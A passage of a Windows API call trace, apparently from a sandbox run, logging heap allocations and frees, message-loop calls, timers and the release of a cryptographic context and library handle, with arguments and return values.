Flags=0x0, Size=0x10) returned 0x2e509b0 [0149.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0149.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0149.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0149.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0149.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0149.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0150.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0150.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0150.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0150.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0150.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0150.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0150.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0150.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0150.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0150.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0150.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0150.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0150.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0150.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0150.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0150.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0150.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0150.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0150.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0150.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0150.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0150.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0150.211] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0150.211] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0150.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0150.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0150.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0150.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0150.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0150.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0150.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0150.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0150.213] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0150.213] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0150.213] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0150.213] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0150.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0150.213] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0150.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0150.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0150.213] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0150.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0150.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0150.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0150.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0150.214] FreeLibrary (hLibModule=0x756e0000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0150.214] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0150.214] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0150.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0150.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0150.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0150.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0150.215] CloseHandle (hObject=0x2d0) returned 1 [0150.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0150.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0150.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0150.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0150.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0150.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0150.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0150.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0150.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0150.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0150.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0150.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0150.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0150.217] CloseHandle (hObject=0x2a0) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0150.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0150.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0150.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0150.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0150.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0150.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0150.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 